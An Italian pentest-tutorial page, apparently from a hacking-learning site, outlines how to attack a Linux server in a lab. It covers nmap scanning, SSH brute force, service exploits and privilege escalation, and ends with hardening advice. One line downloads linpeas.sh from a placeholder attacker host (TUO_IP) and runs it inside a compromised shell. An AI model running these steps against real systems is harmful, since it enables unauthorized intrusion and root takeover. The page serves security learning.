Home › Dispositivi › PC / server Linux
PC / server Linux — cosa puoi fare
La maggior parte dei server è Linux. Si testano SSH, i servizi web, e poi la scalata a root.
Solo su una tua macchina/VM o lab (THM/HTB).
Passo 1 — porte e servizi
sudo nmap -sC -sV -p- 192.168.1.30
Porte tipiche: 22 (SSH), 80/443 (web), 21 (FTP), 3306 (MySQL), 445 (Samba).
Cosa puoi fare / testare
| Cosa | Come | Tool |
|---|---|---|
| Brute SSH | Se hai una lista utenti + wordlist | hydra |
| Usare una chiave trovata | Entri senza password | john (se ha passphrase) |
| Enumerare il sito web | Cartelle/file nascosti → SQLi/LFI/upload | gobuster |
| Cercare exploit dei servizi | Dalla versione trovi la CVE | searchsploit |
| Samba → root | SambaCry / usermap_script | metasploit |
| Privilege escalation → root | SUID, sudo, cron, kernel | linpeas |
Prova a casa (dal servizio alla root)
# versione → exploit
searchsploit vsftpd 2.3.4
# ottenuta una shell, enumera per la root
cd /tmp && wget http://TUO_IP/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
sudo -l
Tutorial: Exploitare i servizi · Privesc Linux.
Difesa
- SSH con chiavi (no password), fail2ban, no root login.
- Aggiorna i servizi; niente versioni vecchie esposte.
- Minimo privilegio in
sudoers; rimuovi SUID inutili.
Catalogo: Arsenale · Sistema.